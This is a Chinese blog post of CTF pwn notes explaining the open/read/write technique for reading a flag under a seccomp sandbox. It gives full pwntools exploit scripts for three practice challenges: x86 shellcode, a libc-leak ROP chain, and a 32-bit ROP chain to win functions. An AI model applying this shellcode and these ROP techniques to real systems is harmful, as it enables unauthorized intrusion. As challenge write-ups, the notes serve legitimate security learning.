orw (pwnable_orw和[V&N2020 公开赛]warmup)和 picoctf_2018_rop chain 记录笔记

最新推荐文章于 2025-03-13 09:05:02 发布
最新推荐文章于 2025-03-13 09:05:02 发布
阅读量1.4k 收藏 3
点赞数 2
分类专栏: CTF 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/carol2358/article/details/106262701
版权

学到一种新的做法,orw(open,read,write),可以用在system,fork syscall(不能打开子进程,需要在当前进程里读入flag并输出) 和execve被禁的情况下打印出flag,还有seccomp
虽然还不太懂,但先记录一下目前的理解
seccomp安全机制能使一个进程进入到一种“安全”运行模式,该模式下的进程只能调用4种系统调用(system call),即 read(), write(), exit() 和 sigreturn(),否则进程便会被终止。
著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。
0表示read,1表示write,打开的文件之后用3表示

pwnable_orw

保护只开了canary
orw,可以自己手写汇编,也可以用pwntools里面带的shellcraft

https://www.jianshu.com/p/ecfecbf6a685

sys_open 系统调用传递的四个寄存器参数即具体实现:

eax = 0x05 系统调用号

ebx = filename 文件名

ecx = flags 置零即可

edx = mode 置零即可

sys_read 系统调用传递的四个寄存器参数即具体实现:

eax = 0x03 系统调用号

ebx = fd 文件指针,就是open的返回值,不需要改变

ecx = buf 缓冲区,指向栈顶位置

edx = count 字节数

sys_write 系统调用传递的四个寄存器参数即具体实现:

eax = 0x04 系统调用号

ebx = fd 文件指针,置为1,打印到屏幕

ecx = buf 缓冲区,指向栈顶

edx = count

flag的16进制为0x666c6167
但写的时候好像开头只要2个6,并且要补0(暂不清楚是为什么)

汇编exp:

from pwn import *
from LibcSearcher import * 

local_file  = './orw'
local_libc  = '/lib/x86_64-linux-gnu/libc-2.23.so'
remote_libc = '/lib/x86_64-linux-gnu/libc-2.23.so'
 
 
select = 1

if select == 0:
    r = process(local_file)
    #libc = ELF(local_libc)
else:
    r = remote('node3.buuoj.cn', 26252)
    #libc = ELF(remote_libc)

elf = ELF(local_file)

context.log_level = 'debug'
context.arch = elf.arch

se      = lambda data               :r.send(data) 
sa      = lambda delim,data         :r.sendafter(delim, data)
sl      = lambda data               :r.sendline(data)
sla     = lambda delim,data         :r.sendlineafter(delim, data)
sea     = lambda delim,data         :r.sendafter(delim, data)
rc      = lambda numb=4096          :r.recv(numb)
rl      = lambda                    :r.recvline()
ru      = lambda delims			    :r.recvuntil(delims)
uu32    = lambda data               :u32(data.ljust(4, '\0'))
uu64    = lambda data               :u64(data.ljust(8, '\0'))
info_addr = lambda tag, addr        :r.info(tag + ': {:#x}'.format(addr))

def debug(cmd=''):
     gdb.attach(r,cmd)


p = '''
push 0x0
push 0x67616c66
xor ecx, ecx
xor edx, edx
mov ebx, esp
mov eax, 0x5
int 0x80
nop
mov eax, 0x3 
mov ebx, 0x3
mov ecx, esp
mov edx, 0x100
int 0x80
nop
mov eax, 0x4
mov ebx, 0x1
mov ecx, esp
mov edx, 0x100
int 0x80
'''

sea('Give my your shellcode:', asm(p))




r.interactive()

shellcraft exp:

from pwn import *
from LibcSearcher import * 

local_file  = './orw'
local_libc  = '/lib/x86_64-linux-gnu/libc-2.23.so'
remote_libc = './libc-2.23.so'
 
 
select = 1

if select == 0:
    r = process(local_file)
    #libc = ELF(local_libc)
else:
    r = remote('node3.buuoj.cn', 28154)
    #libc = ELF(remote_libc)

elf = ELF(local_file)

context.log_level = 'debug'
context.arch = elf.arch

se      = lambda data               :r.send(data) 
sa      = lambda delim,data         :r.sendafter(delim, data)
sl      = lambda data               :r.sendline(data)
sla     = lambda delim,data         :r.sendlineafter(delim, data)
sea     = lambda delim,data         :r.sendafter(delim, data)
rc      = lambda numb=4096          :r.recv(numb)
rl      = lambda                    :r.recvline()
ru      = lambda delims			    :r.recvuntil(delims)
uu32    = lambda data               :u32(data.ljust(4, '\0'))
uu64    = lambda data               :u64(data.ljust(8, '\0'))
info_addr = lambda tag, addr        :r.info(tag + ': {:#x}'.format(addr))

def debug(cmd=''):
     gdb.attach(r,cmd)


sh = shellcraft.open('./flag')
sh += shellcraft.read(3, 'esp', 100)
sh += shellcraft.write(1, 'esp', 100)
sh = asm(sh)
sla('Give my your shellcode:',sh)

r.interactive()

- [V&N2020 公开赛]warmup

pie开了,除了canary都开了
这题也让我学到了新东西,比如bss,pop_di等等用的都是libc里的,要ROPgadget --binary libc --only ‘pop|ret’ | grep ‘rdi’ 和 readelf -S libc | grep “.bss”
后面只能溢出0x10,最多覆盖ret
因为本题不含有flag字符串,所以先用read写入flag到bss段,然后orw打印flag
在第一个rop结束之后,栈正好恢复到上一个函数,因此可以继续执行rop

exp:

from pwn import *
from LibcSearcher import * 

local_file  = './vn_pwn_warmup'
local_libc  = '/lib/x86_64-linux-gnu/libc-2.23.so'
remote_libc = '/lib/x86_64-linux-gnu/libc-2.23.so'
 
 
select = 1

if select == 0:
    r = process(local_file)
    libc = ELF(local_libc)
else:
    r = remote('node3.buuoj.cn', 29550)
    libc = ELF(remote_libc)

elf = ELF(local_file)

context.log_level = 'debug'
context.arch = elf.arch

se      = lambda data               :r.send(data) 
sa      = lambda delim,data         :r.sendafter(delim, data)
sl      = lambda data               :r.sendline(data)
sla     = lambda delim,data         :r.sendlineafter(delim, data)
sea     = lambda delim,data         :r.sendafter(delim, data)
rc      = lambda numb=4096          :r.recv(numb)
rl      = lambda                    :r.recvline()
ru      = lambda delims			    :r.recvuntil(delims)
uu32    = lambda data               :u32(data.ljust(4, '\0'))
uu64    = lambda data               :u64(data.ljust(8, '\0'))
info_addr = lambda tag, addr        :r.info(tag + ': {:#x}'.format(addr))

def debug(cmd=''):
     gdb.attach(r,cmd)


ru('Here is my gift: 0x')
puts_addr = int(rc(12), 16)
info_addr('puts', puts_addr)
libcbase = puts_addr - 0x06f690
libcbase = puts_addr - libc.sym['puts']
info_addr('libcbase', libcbase)

open_addr = libcbase + libc.sym['open']
read = libcbase + libc.sym['read']
write = libcbase + libc.sym['write']
bss = 0x00000000003c5720 + libcbase

pdi = 0x0000000000021102 +libcbase #pop rdi ; ret
psi = 0x00000000000202e8 +libcbase #pop rsi ; ret
pdx = 0x0000000000001b92 +libcbase #pop rdx ; ret
pdx_si = 0x00000000001150c9 +libcbase  #pop rdx ; pop rsi ; ret

p=p64(0)
p += p64(pdx_si) + p64(0x100) + p64(bss+0x800) + p64(read)
p += p64(pdi) + p64(bss+0x800) + p64(pdx_si) + p64(0) + p64(0) + p64(open_addr)
p += p64(pdi) + p64(3) + p64(pdx_si) + p64(0x100) + p64(bss+0x800) + p64(read)
p += p64(pdi) + p64(1) + p64(pdx_si) + p64(0x100) + p64(bss+0x800) + p64(write)

sea('Input something: ', p)
p = 'a'*0x78 + p64(pdi)
sea('What\'s your name?', p)
se('flag\x00\x00\x00\x00')

r.interactive()

- picoctf_2018_rop chain

这题是一个32位的rop chain, 达成flag的条件就可以拿到flag
exp:

from pwn import *
from LibcSearcher import * 

local_file  = './PicoCTF_2018_rop_chain'
local_libc  = '/lib/x86_64-linux-gnu/libc-2.27.so'
remote_libc = '/lib/x86_64-linux-gnu/libc-2.27.so'
 
 
select = 1

if select == 0:
    r = process(local_file)
    #libc = ELF(local_libc)
else:
    r = remote('node3.buuoj.cn', 26850)
    #libc = ELF(remote_libc)

elf = ELF(local_file)

context.log_level = 'debug'
context.arch = elf.arch

se      = lambda data               :r.send(data) 
sa      = lambda delim,data         :r.sendafter(delim, data)
sl      = lambda data               :r.sendline(data)
sla     = lambda delim,data         :r.sendlineafter(delim, data)
sea     = lambda delim,data         :r.sendafter(delim, data)
rc      = lambda numb=4096          :r.recv(numb)
rl      = lambda                    :r.recvline()
ru      = lambda delims 		    :r.recvuntil(delims)
uu32    = lambda data               :u32(data.ljust(4, '\0'))
uu64    = lambda data               :u64(data.ljust(8, '\0'))
info_addr = lambda tag, addr        :r.info(tag + ': {:#x}'.format(addr))

def debug(cmd=''):
     gdb.attach(r,cmd)

win1 = 0x080485CB 
win2 = 0x080485D8
flag = 0x0804862B
#main = elf.sym['main']
#pop_ret = 0x080485d6 # pop ebp ; ret


p = 'a'*0x18 + 'b'*4 + p32(win1) + p32(win2) + p32(flag) + p32(0xBAAAAAAD)
p += p32(0xDEADBAAD)
sea('Enter your input> ', p)


r.interactive()
BUUCTF--[V&N2020 公开赛]warmup
A13837377363的博客
05-30 348
在不指定rsi的情况,open会直接将rsi里面的值作为flag值,而rsi里面有时候存着地址,是一个极大值,可能会引起一些意想不到的问题。例如这题中,执行rop的时候rsi存着的是buf的地址,是一个极大值,一开始我没有pop rsi为0,导致执行了好几遍都没法orw成功,加上了pop rsi 0才成功读出flag。有沙盒,分析了一下,write的count不等于0x10就可以,0x30什么的都可以。怎么办呢,细心的小伙伴会发现我们知道libc的基址,那可以写在libc的bss上面啊。
BUUCTF [V&N2020 公开赛]warmup
BengDouLove的博客
04-14 882
sub_80A函数进去是初始化设置缓冲区没啥用 sub_84D进去是这样的 进去之后一大堆变量。。。不太想看,,就挑重点的吧 这个prctl 函数简单来说也是设置了沙箱规则 #include <sys/prctl.h> int prctl(int option, unsigned long arg2, unsigned long arg3, unsigned long ar...
[V&N2020 公开赛]warmup
wuyvle的博客
03-10 159
这是一个沙盒题 禁止了execvefork syscall sub_9A1()函数,第二个输入点,可以溢出16字节,也就是我们正好只能覆盖到ret 但是这个函数在调用 sub_9D3 函数的之前没有任何东西入栈 调用 sub_9A1 的返回地址入栈,覆盖完返回地址,下个8字节又正好是我们上次输入的东西,所以两次输入可以连起来,作为一个ROP链 一般沙盒类型的题目都不会禁掉open,read,write这三个函数,我们可以想办法在程序中读出flag,并输出,从而得到flag from pwn impor
CTF题目《SSRFMe》(网鼎杯 2020 玄武组)WriteUp
最新发布
qq_46143339的博客
03-13 1747
Gopher是一种早期的互联网协议,设计于1991年,用于在网络上通过层次化菜单系统高效检索文本信息。其核心是。
[V&N2020 公开赛]warmup[BUUCTF]
moonlightsunshin的博客
05-08 496
因为是64位的程序,参数的传递需要用到堆栈,64位与32位函数调用在这里就不再赘述,所以我们还需要rdi,rsi,rdx来传递参数,一块空的内存用来存放我们flag。给了我们puts函数的地址所以可以泄露出libc基址,通过libc基址泄露出write,read,open三个函数的地址。execve被禁止了,这类沙箱一般都可以通过write,open,read这三函数来实现flag读进去写出来。这个函数定义了很多局部变量,不太懂看了其他师傅的wp,这个函数是用于设置沙箱机制。sub_9A1()可以溢出。
buuctf [V&N2020 公开赛]warmup
qq_42728977的博客
04-14 506
禁了exceve,只能用open》read》puts了 参考链接 https://www.cnblogs.com/luoleqi/p/12468271.html http://www.starssgo.top/2020/03/04/%C2%96%C2%96%C2%96%C2%96-V-N2020-%E5%85%AC%E5%BC%80%E8%B5%9B-pwn/#warmup ...
关于沙箱关闭execve的绕过技巧及SROP的简单利用方法 --(buuctf[V&N2020 公开赛])babybabypwn + warmup
PLpa的博客
07-05 1720
前言 最近做buuctf又发现一种以前没有见过的沙箱关闭execve的题目,在网上找了很多资料,终于初步了解了一些简单的绕过技巧,故写此博客记录一下。 [V&N2020 公开赛]babybabypwn 查看保护 保护全开的64位Linux程序。 IDA查看伪代码 直接进入main函数看看,发现syscall函数,并不是很了解这个函数,但是通过百度我们知道syscall的几个参数的意义。 第一个参数表示syscall调用的函数,例如题目中的15调用的就是sigreturn。 看到sigreturn
BUUCTF-PWN刷题记录-4
weixin_44145820的博客
04-10 1152
目录hitcontraining_secretgarden hitcontraining_secretgarden 这题需要使用double free size字段的高四位可以不为0
buuctf刷题记录(一)
qq_43571856的博客
08-03 428
vn_pwn_warmup 开了nxpie 这里给了puts的地址,可以得到libc的基地址 只有这里有个溢出点能溢出0x10个字节 原本的想法是直接用one_gadget来获得shell 但是一直都打不通,由于开了pie也没法本地调试 后来看了大佬的题解,才知道这个题禁用了execve。现在也不知道从哪里看出来的。 对于这种禁用execve或者没法使用system直接getshell的题。 我们可以使用orw来做。 可以把paylaod写到这里 然后在跳到这里执行 但是这个题没法用题目文件里的r
BUUOJ PWN 61-80
2h4ox1n9
12-17 326
61\
【CTF】【PWNorw
m0_50819561的博客
10-09 1667
这是沙盒机制,就是限制你能使用的syscall。 seccomp-tools这个工具能快速地查出你能使用地syscall。 我们能使用的常用的构造攻击链的只有open,read,write。 但是因为限制了syscall,所以我们不能用特殊的系统调用getshell。 有两种方法,一种直接写汇编,一种利用shellcraft构造。 下面是汇编: ...
网鼎杯writeup-护网先锋1
08-04
3、得到 flag,截图如下图所示: 1、查看源代码可以发现存在代码泄露,代码如下: 2、在 get 中使用.可以绕过第一个判断 3、使用.@c7f.zhuqu
pwnable.tw】orw
qq_61670993的博客
09-22 203
32位orw,很简单没啥好说的。
pwnorw
weixin_43960998的博客
06-19 1947
本文分为两部分,一部分是2.27及一下的 setcontext + orw,一部分是 2.29 及以上的 setcontext + orw。 利用条件 2.27: 开了沙箱 uaf 等控制 free_hook 一、2.27 libc 2.27及以下的 setcontext: 给各寄存器传参分别由 rdi 来完成,一般的套路是线泄漏 libc heap_base,我们把某一个 chunk 填充为: frame = SigreturnFrame() frame.rsp = libc.sym['__fr
[BUUCTF-pwn]——pwnable_orw
半岛铁盒的博客
06-12 1797
记一次ORW的题目 orw就是指你的系统调用被禁止了,不能通过子进程去获得权限flag,只能在该进程通过 open , read ,write来得到flag 32位程序,开启了canary 调用orw_seccomp函数后,输入shellcode后执行shellcode 写入sys_call的shellcode,发现不能执行 orw_seccomp函数 seccomp 是 secure computing 的缩写,其是 Linux kernel 从2.6.23版本引入的一种简洁的 sandbox
orw--libc
fuiifiuiii的博客
07-08 462
栈上的orw,十分易学,适合刚刚接触orw的小伙伴·
0CTF_2016_warmup(alarm在rop中控制eax,orw
m0_51251108的博客
09-20 239
alarm妙用
【八芒星计划】 ORW
carol2358的博客
09-01 4155
本篇用来记录ORWORW可以分为2.27以下的orw2.29以上的orw,如果是本地请自备flag文件 orw技术是用来应对沙盒的 文章目录oooorder2019-BALSN-CTF-plaintext oooorder 本题是2.27的orw,漏洞是uaf,漏洞在这里不展开讲,uaf也并不难 2.27的orw既可以使用heap_addr,也可以不要,先讲不需要heap_addr的,毕竟能少泄漏就少泄漏 最重要的是使用了setcontext这个函数,来达成我们控制寄存器的目的 2.27得setcont
PWN题[强网先锋]orw超详细讲解(多解法)
am_03的博客
09-01 4862
知识点 构造一段shellcode的作用就是为了在缓冲区溢出时将shellcode的地址覆盖正常的返回地址。 \x00 截断符 shellcode里出现\x00就会从其截断,所以构造shellcode的时候要避免\x00 x64函数调用规则 x64机器在调用某个函数前,比如int func(int a, int b, int c, int d, int e, int f, int g, int h),首先他会把前6个参数从左往右存入到寄存器rdi、rsi、rdx、rcx、r8、r9,其余参数存入到栈里,保存
如何在欧姆龙PLC中实现复杂的逻辑控制?请结合ANDW、ORW、XORWXNRW指令,给出一个实际编程示例。
11-07
在工业自动化控制中,PLC(可编程逻辑控制器)承担着至关重要的角色。掌握逻辑运算指令对于编程者来说是基础,也是实现复杂逻辑控制的前提。特别是欧姆龙PLC中的ANDW、ORW、XORWXNRW指令,它们分别对应逻辑与、逻辑或、逻辑异或逻辑同或操作,是完成各种控制逻辑的核心。 参考资源链接:[欧姆龙PLC逻辑运算指令详解:ANDW, ORW, XORW, XNRW](https://wenku.csdn.net/doc/7kx4n0270r?spm=1055.2569.3001.10343) 为了深入了解这些指令的实际应用,建议参考《欧姆龙PLC逻辑运算指令详解:ANDW, ORW, XORW, XNRW》,该资料详细介绍了这些指令的用法适用场景,帮助你编写更加高效精确的PLC程序。 在编写程序时,首先需要了解输入输出(I/O)地址分配,这是逻辑控制的基础。然后,可以利用梯形图或指令列表等编程语言,将ANDW、ORW、XORWXNRW指令应用到程序中。例如,一个简单的逻辑控制任务可能是:当输入X0X1同时满足某种条件时,输出Y0才被激活。这时可以使用ANDW指令来实现。 下面是一个简单的编程示例: 1. 假设X0X1分别代表两个传感器的信号,需要当这两个传感器同时检测到信号时,才触发输出Y0。 2. 在梯形图中,你可以使用两个接点(X0X1)作为ANDW指令的输入,然后将其连接到输出Y0。 ```plaintext +----[/]----[/]----( )----+ | X0 X1 Y0 | +-------------------------+ ``` 在上面的梯形图中,[/]代表常开接点,( )代表线圈。当X0X1同时为ON状态时,Y0线圈被激活。 除了简单的逻辑与操作,逻辑或、异或同或操作也有广泛的应用。例如,当你需要控制至少有一个传感器检测到信号时激活输出,或者需要在不同传感器信号不一致时激活输出,就可以使用ORWXORW指令来实现。 通过上述示例,你可以看到,通过合理地使用这些逻辑运算指令,可以构建出满足不同工业控制需求的逻辑控制程序。为了深入理解并熟练应用这些指令,推荐深入学习《欧姆龙PLC逻辑运算指令详解:ANDW, ORW, XORW, XNRW》中的内容,这样将有助于你在工业控制编程领域取得更大的进步。 参考资源链接:[欧姆龙PLC逻辑运算指令详解:ANDW, ORW, XORW, XNRW](https://wenku.csdn.net/doc/7kx4n0270r?spm=1055.2569.3001.10343)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值